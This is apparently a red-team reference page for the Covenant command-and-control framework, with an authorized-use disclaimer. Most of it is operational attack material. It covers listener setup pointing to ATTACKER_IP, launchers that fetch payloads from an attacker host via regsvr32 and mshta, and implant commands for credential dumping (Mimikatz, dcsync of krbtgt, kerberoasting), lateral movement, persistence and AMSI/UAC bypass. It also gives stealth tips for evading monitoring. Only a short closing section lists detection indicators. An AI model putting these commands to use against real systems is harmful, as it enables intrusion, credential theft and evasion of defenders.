COVENANT
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
.NET-based C2 framework with a web interface, multi-user support, and extensive post-exploitation capabilities via "Grunts."
INSTALLATION & SETUP#
# Prerequisites
# .NET Core 3.1 SDK (or .NET 7+ for newer forks)
# Git
# Clone and build
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet build
dotnet run
# Docker installation
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant
docker build -t covenant .
docker run -it -p 7443:7443 -p 80:80 -p 443:443 \
--name covenant -v $(pwd)/Data:/app/Data covenant
# Access web interface
# https://127.0.0.1:7443
# Create admin account on first run
LISTENERS#
# Create via web UI: Listeners > Create Listener # HTTP Listener Name: MyHTTPListener BindAddress: 0.0.0.0 BindPort: 80 ConnectAddress: ATTACKER_IP ConnectPort: 80 URLs: /api/v1, /static/js, /images/logo UseSSL: false # HTTPS Listener Name: MyHTTPSListener BindAddress: 0.0.0.0 BindPort: 443 ConnectAddress: cdn.legit.com ConnectPort: 443 UseSSL: true SSLCert: Upload PFX certificate SSLCertPass: Certificate password # Bridge Listener (C2 over C2) Used for pivoting through other channels Connects two Covenant instances # Listener Profiles Customize HTTP headers, URLs, cookies, response bodies Create profiles to mimic legitimate web traffic
LAUNCHERS#
# Generate via web UI: Launchers > Create Launcher # PowerShell Launcher Listener: Select active listener DotNetVersion: Net40 or Net35 Delay: 5 (seconds between callbacks) JitterPercent: 20 # Generates encoded PowerShell one-liner # Binary Launcher Generates standalone .exe Can be x86 or x64 # MSBuild Launcher Generates .xml for MSBuild.exe execution Living-off-the-land technique # C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe launcher.xml # InstallUtil Launcher Generates .dll for InstallUtil.exe # C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U launcher.dll # Regsvr32 Launcher Generates .sct file for regsvr32 # regsvr32 /s /n /u /i:http://ATTACKER/launcher.sct scrobj.dll # Mshta Launcher Generates .hta for mshta.exe # mshta http://ATTACKER/launcher.hta # Cscript / Wscript Launcher Generates .vbs or .js scripts # certutil Launcher Uses certutil to download and decode payload # Common launcher settings Delay: Callback interval in seconds JitterPercent: Jitter percentage (0-100) KillDate: Agent expiration (UTC) ConnectAttempts: Max connection retries
GRUNT INTERACTION#
# Grunts are Covenant's implant agents # Interact via web UI: Grunts > Click active Grunt # Information gathering Grunt> WhoAmI # Current user Grunt> GetCurrentDirectory # Working directory Grunt> GetHostname # Machine hostname Grunt> GetDomainName # Domain name Grunt> ListDirectory C:\ # Directory listing Grunt> ProcessList # Running processes Grunt> GetNetworkInterfaces # Network info Grunt> GetRegistryKey HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion" # File operations Grunt> Download C:\Users\admin\flag.txt Grunt> Upload /local/path C:\remote\path Grunt> ReadTextFile C:\path\file.txt Grunt> WriteFile C:\path\file.txt "content" Grunt> DeleteFile C:\path\file.txt Grunt> CopyFile C:\src C:\dst Grunt> MoveFile C:\src C:\dst # Execution Grunt> Shell whoami # cmd.exe /c Grunt> PowerShell Get-Process # PowerShell execution Grunt> Assembly /path/to/tool.exe "args" # .NET assembly Grunt> ShellCmd cmd.exe /c "dir" # Explicit shell command # Credential access Grunt> Mimikatz sekurlsa::logonpasswords Grunt> Mimikatz lsadump::sam Grunt> Mimikatz lsadump::dcsync /domain:DOMAIN /user:krbtgt Grunt> Rubeus kerberoast Grunt> Rubeus asreproast Grunt> Seatbelt -group=all Grunt> SharpDPAPI triage # Active Directory Grunt> SharpHound -c All Grunt> PowerView Get-DomainUser Grunt> PowerView Get-DomainGroup Grunt> PowerView Find-DomainShare Grunt> PowerView Get-DomainGPO # Lateral movement Grunt> WMIGrunt TARGET LISTENER user password Grunt> DCOMGrunt TARGET LISTENER Grunt> BypassUACGrunt LISTENER Grunt> PowerShellRemotingGrunt TARGET LISTENER # Pivoting Grunt> ConnectAttempt PIVOT_GRUNT_IP 443 # Connect through pivot # Persistence Grunt> PersistStartup C:\payload.exe # Startup folder Grunt> PersistWMI # WMI event subscription Grunt> PersistAutorun # Registry autorun # Token manipulation Grunt> ImpersonateUser DOMAIN\user password Grunt> ImpersonateProcess PID Grunt> MakeToken DOMAIN\user password Grunt> RevertToSelf Grunt> GetSystem # Escalate to SYSTEM Grunt> LogonPasswords # Dump logon passwords # Evasion Grunt> BypassAmsi # Patch AMSI Grunt> BypassUAC # UAC bypass Grunt> ScreenShot # Take screenshot
TASK REFERENCE#
Category Key Tasks
-------- ---------
Recon WhoAmI, GetHostname, GetDomainName, ProcessList,
GetNetworkInterfaces, GetRegistryKey, Seatbelt
File Ops Download, Upload, ReadTextFile, ListDirectory,
DeleteFile, CopyFile, MoveFile
Execution Shell, PowerShell, Assembly, ShellCmd
Credentials Mimikatz, Rubeus, SharpDPAPI, LogonPasswords
AD Enum SharpHound, PowerView, SharpView
Lateral Move WMIGrunt, DCOMGrunt, PowerShellRemotingGrunt
Priv Esc GetSystem, BypassUAC, BypassUACGrunt
Persistence PersistStartup, PersistWMI, PersistAutorun
Evasion BypassAmsi, BypassUAC
Token ImpersonateUser, ImpersonateProcess, MakeToken
MULTI-USER OPERATIONS#
- Web interface supports multiple simultaneous operators - Role-based access: Admin, User, Listener roles - All Grunt interactions logged with operator attribution - Task history and output accessible to all operators - Real-time updates across operator sessions
GRAPH VIEW#
- Visual representation of compromised hosts - Shows Grunt connections and pivot chains - Click nodes to interact with Grunts - Helps visualize network topology during engagement
API ACCESS#
# Covenant exposes a REST API
# Authentication via JWT tokens
# Get token
curl -k https://127.0.0.1:7443/api/users/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":"pass"}'
# Use API for automation
curl -k https://127.0.0.1:7443/api/grunts \
-H "Authorization: Bearer JWT_TOKEN"
OPSEC CONSIDERATIONS#
- Set appropriate delay and jitter for stealth - Use HTTPS with valid certificates - Customize listener HTTP profiles to mimic legit traffic - Use MSBuild/InstallUtil launchers for LOLBIN execution - Avoid PowerShell launcher in monitored environments - Set kill dates on Grunts - In-memory .NET execution avoids disk writes - Covenant is .NET-based; CLR loading is detectable - Monitor for AMSI bypass detections - Use Bridge listeners for complex pivoting
DETECTION INDICATORS#
- .NET CLR loading in unexpected processes - HTTP callback patterns matching listener profile - PowerShell script block logging - Covenant-specific HTTP headers (if defaults used) - Named pipe usage for inter-process communication - Process hollowing or injection events - WMI/DCOM lateral movement events - AMSI bypass attempts